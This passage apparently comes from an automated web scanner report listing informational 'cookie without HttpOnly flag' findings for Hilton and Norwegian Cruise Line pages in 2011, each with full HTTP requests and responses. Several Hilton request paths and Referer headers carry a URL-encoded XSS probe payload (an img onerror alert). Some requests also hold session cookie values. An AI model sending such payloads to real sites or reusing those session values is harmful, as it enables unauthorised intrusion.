The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:13 GMT;path=/
Content-Length: 45350


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="
...[SNIP]...
12.88. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Edc3906d35ca/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Edc3906d35ca/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Edc3906d35ca/a HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Edc3906d35ca/services.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; GWSESSIONID=FhsfTJ2VMncTqGXGJ7zpj1LBynqmYRYzv1yLPJtV2Qy2CsLdXGn5!-1829748891; ClrCSTO=T; mmcore.tst=0.297; mmid=637150661%7CEwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=637150661%7CEwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637464767:ss=1317635584777

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:53 GMT
ETag: "90a-cf752a40"
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2314
Date: Mon, 03 Oct 2011 13:23:58 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:34:58 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<meta http-equiv
...[SNIP]...
12.89. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ee41feaea175/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ee41feaea175/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ee41feaea175/a HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ee41feaea175/localguide.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; GWSESSIONID=FhsfTJ2VMncTqGXGJ7zpj1LBynqmYRYzv1yLPJtV2Qy2CsLdXGn5!-1829748891; ClrCSTO=T; mmcore.tst=0.297; mmid=637150661%7CEwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=637150661%7CEwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637464767:ss=1317635584777; ClrSSID=1317646383790-9086

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:53 GMT
ETag: "90a-cf752a40"
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2314
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:24:07 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153db63660;expires=Mon, 03-Oct-11 13:35:07 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<meta http-equiv
...[SNIP]...
12.90. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/photoGallery.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/photoGallery.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH/photoGallery.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; NSC_qse-qgt=44153d5f3660; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635641939:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:47 GMT
Content-Length: 34448
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:47 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-sta
...[SNIP]...
12.91. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/res-widget-to-gw.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/res-widget-to-gw.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH/res-widget-to-gw.do?checkInDay=3&checkInMonthYr=October+2011&checkOutDay=4&checkOutMonthYr=October+2011&flexCheckInDay=3&flexCheckInMonthYr=October+2011&los=1&ctyhocn=BOSLHHH&isReward=false&flexibleSearch=false&source=hotelResWidget HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?xch=1041790138,4E9B21AE664381D1B53DE8378483FB39.etc13&inputModule=HOTEL&checkInDay=3&checkInMonthYr=October+2011&checkOutDay=4&checkOutMonthYr=October+2011&flexCheckInDay=3&flexCheckInMonthYr=October+2011&los=1&ctyhocn=BOSLHHH&isReward=false&flexibleSearch=false&source=hotelResWidget&pfsLocale=en
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 03 Oct 2011 12:53:56 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:56 GMT;path=/

12.92. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH45db3%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0f6e1a8e424/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH45db3%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0f6e1a8e424/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH45db3%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0f6e1a8e424/a HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH45db3%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0f6e1a8e424/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; GWSESSIONID=FhsfTJ2VMncTqGXGJ7zpj1LBynqmYRYzv1yLPJtV2Qy2CsLdXGn5!-1829748891; mmid=-2143162459%7CEgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-2143162459%7CEgAAAAodekFwyAYAAA%3D%3D; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637392594:ss=1317635584777; mmcore.tst=0.297

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:53 GMT
ETag: "90a-cf752a40"
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2314
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:23:50 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153db63660;expires=Mon, 03-Oct-11 13:34:50 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<meta http-equiv
...[SNIP]...
12.93. http://www1.hilton.com/ts/en_US/hi/jsp/inc_home_flash.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /ts/en_US/hi/jsp/inc_home_flash.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ts/en_US/hi/jsp/inc_home_flash.xml HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/common/media/flash/rotator_v1.swf?xmlFile=/ts/en_US/hi/jsp/inc_home_flash.xml&cssFile=/ts/en_US/hi/jsp/inc_home_flash.css
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 03 Oct 2011 02:17:29 GMT
ETag: "f12-93a28040"
Accept-Ranges: bytes
Content-Type: text/xml
Cache-Control: private
Content-Length: 3858
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:47 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:47 GMT;path=/


<Document>
   <Left>
       <Item id="1">
           <Title><font color="#160a67"><a href="http://www.hilton.com/en/hi/promotions/hi_huanying/index.jhtml?cid=OM,HH,Huanying,News1" target="_blank">Hilton Huanying</a
...[SNIP]...
12.94. http://www2.ncl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645008-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Content-Length: 45949
Date: Mon, 03 Oct 2011 12:46:50 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: Ncl_countryName=US; expires=Tue, 18-Oct-2011 12:46:50 GMT
Set-Cookie: Ncl_region=TX; expires=Tue, 18-Oct-2011 12:46:50 GMT
Set-Cookie: Ncl_city=Dallas; expires=Tue, 18-Oct-2011 12:46:50 GMT
Set-Cookie: Ncl_latitude=32.809799; expires=Tue, 18-Oct-2011 12:46:50 GMT
Set-Cookie: Ncl_longitude=-96.799301; expires=Tue, 18-Oct-2011 12:46:50 GMT
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.95. http://www2.ncl.com/about/careers/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/careers/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/careers/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 41424

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.96. http://www2.ncl.com/about/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/contact-us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contact-us HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317631645-1"
Last-Modified: Mon, 03 Oct 2011 08:47:25 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Content-Length: 67525

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.97. http://www2.ncl.com/about/environmental-commitment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/environmental-commitment

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/environmental-commitment HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:33:33 +0000
ETag: "1317638013-1"
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 47797

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.98. http://www2.ncl.com/about/staying-connected-sea-internet-access  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/staying-connected-sea-internet-access

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/staying-connected-sea-internet-access HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:03:50 +0000
ETag: "1317647030-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Content-Length: 50010

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.99. http://www2.ncl.com/cruise-destinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /cruise-destinations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cruise-destinations HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ncl.com/nclweb/cbooking/submitPricingQualifiers.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:54:49 +0000
ETag: "1317639289-1"
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Content-Length: 60847
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.100. http://www2.ncl.com/destination/canada_new_engl/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/hotel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/canada_new_engl/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:53 GMT
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:53 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:53 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
